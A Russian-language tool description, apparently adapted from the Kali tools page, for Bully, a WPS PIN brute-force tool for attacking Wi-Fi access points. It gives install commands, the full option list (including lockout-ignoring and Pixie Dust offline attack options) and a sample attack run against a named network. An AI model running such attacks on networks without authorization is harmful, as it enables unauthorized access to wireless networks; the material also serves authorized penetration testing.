Bully — это новое воплощение WPS атаки методом перебора паролей, расширенный и дополненный аналог Reaver. Программа написана на языке C и концептуально идентична другим программам в использовании ошибок проектирования спецификации WPS. По сравнению с оригинальным кодом аналогичных программ, данная программа имеет несколько преимуществ, таких как:
катагенез зависимостей;
улучшение памяти и времени работы центрального процессора;
правильная обработка порядка следования байтов и более функциональный набор опций.
Программа работает на Linux, и была специально создана для использования на встроенных системах Linux (OpenWrt, и т.д.) без привязки к архитектуре. Bully обеспечивает ряд усовершенствований в обнаружении и обработке аномальных сценариев. Она была успешно протестирована на точках доступа многих производителей, а также с различными конфигурациями.
У вас должна быть уже установлена программа Wiire’s Pixiewps. | Последнюю версию можно найти здесь. |
Технические требования
apt-get -y
вызовет установку дополнительных пакетов и библиотек build-essential libpcap-dev libssl-dev aircrack-ng pixiewp
Установка Bully
Скачайте
git clone https://github.com/aanarchyy/bully
или
wget https://codeload.github.com/aanarchyy/bully/zip/master && unzip master.zip
Настройте
cd bully*/ cd src/ make
Установите
sudo make install
Использование bully
root@kali:~# bully -h
bully <options> интерфейс
Необходимые параметры:
Интерфейс : Беспроводной интерфейс в режиме монитора (требуется root)
-b, --bssid macaddr : MAC адрес целевой точки доступа
Or
-e, --essid string : Расширенный SSID для точки доступа
Дополнительные параметры:
-c, --channel N[,N...] : Номер канала AP, или список единиц измерения [b/g]
-i, --index N : Начальный индекс пина (7 или 8 символов) [Auto]
-l, --lockwait N : Секунд для ожидания если AP заблокирован WPS [43]
-o, --outfile file : Файл для вывода сообщений [stdout]
-p, --pin N : Начальный номер пина (7 или 8 символов) [Auto]
-s, --source macaddr : Исходный (железный) MAC адрес [Probe]
-v, --verbosity N : Уровень вербальности 1-4, 1 – самый тихий [3]
-w, --workdir path : Расположение файлов пина/сессии [~/.bully/]
-5, --5ghz : Список каналов по умолчанию для прыжков 5GHz a/n [No]
-B, --bruteforce : Контрольная сумма пинов WPS для подбора пароля [No]
-F, --force : Принудительно продолжать несмотря на предупреждения [No]
-S, --sequential : Последовательные пины (не рандомизировать) [No]
-T, --test : Режим тестирования (не вводить какие-либо пакеты) [No]
Продвинутые параметры:
-d, --pixiewps : Попытка использования pixiewps [No]
-a, --acktime N : Устаревшая/игнорируемая [Auto]
-r, --retries N : Повторная отправка пакетов N раз, когда нет подтверждения [2]
-m, --m13time N : Устаревшая/игнорируемая [Auto]
-t, --timeout N : Устаревшая/игнорируемая [Auto]
-1, --pin1delay M,N : Задержка M секунд каждое N не подтверждение в M5 [0,1]
-2, --pin2delay M,N : Задержка M секунд каждое N не подтверждение в M7 [5,1]
-A, --noacks : Отключить проверку ACK для отправляемых пакетов [No]
-C, --nocheck : Пропустить валидацию CRC/FCS (производительность) [No]
-D, --detectlock : Выявить WPS блокировки, о которых не сообщает AP [No]
-E, --eapfail : EAP Failure после каждой отправки [No]
-L, --lockignore : Игнорировать WPS блокировки, о которых сообщает AP [No]
-M, --m57nack : M5/M7 таймаут рассматриваемый как WSC_NACK's [No]
-N, --nofcs : Пакеты не содержат поле FCS [Auto]
-P, --probe : Использовать запросы зондирования для AP [No]
-R, --radiotap : Предположительно, что заголовки radio tap присутствуют [Auto]
-W, --windows7 : Делать вид, что регистрируется Windows 7 [No]
-Z, --suppress : Подавлять алгоритм тротинга пакетов [No]
-V, --version : Напечатать версию и выйти
-h, --help : Напечатать эту справку
-d // —pixiewps
Опция -d выполняет автономную атаку, Pixie Dust (pixiewps), автоматически передавая PKE, PKR, E-Hash1, E-Hash2, E-Nonce и Authkey, pixiewps будет пытаться атаковать Ralink, Broadcom и Realtek чипсеты.
-v // — verbosity
Опция –v определяет вербальность bully. – v 4 печатает все собранные хэши и выводит команду запустить pixiewps. По умолчанию уровень запуска 3.
Пример использования Bully
Атака беспроводной сети ESSID (-е 6F36E6) с использованием интерфейса режима монитора (mon0) :
root@kali:~# bully -e 6F36E6 mon0
[!] Bully v1.0-22 - оценка уязвимости WPS
[X] Неизвестная частота '-113135872' сообщает интерфейсу 'mon0'
[!] Использование '00:1f:33:f3:51:13' для источника MAC - адресов
[+] Datalink тип установлен в '127 ', показывает заголовки
[+] Опрашиваем '6F36E6' на канале 'неизвестно'
[+] Получил ответ для '6F36E6' (9c:d3:6d:b8:ff:56)
[+] Переключение интерфейса 'mon0' для канала '8'
[!] Информационный элемент указывает, что WPS заблокирован
[!] Создание нового рандомизированного pin - файла '/root/.bully/pins'
[+] Индекс исходного pin '0000000'
[+] Последний статус = 'NoAssoc' Следующий pin '54744431'
При подготовке материала использована информация https://github.com/aanarchyy/bully и http://tools.kali.org/wireless-attacks/bully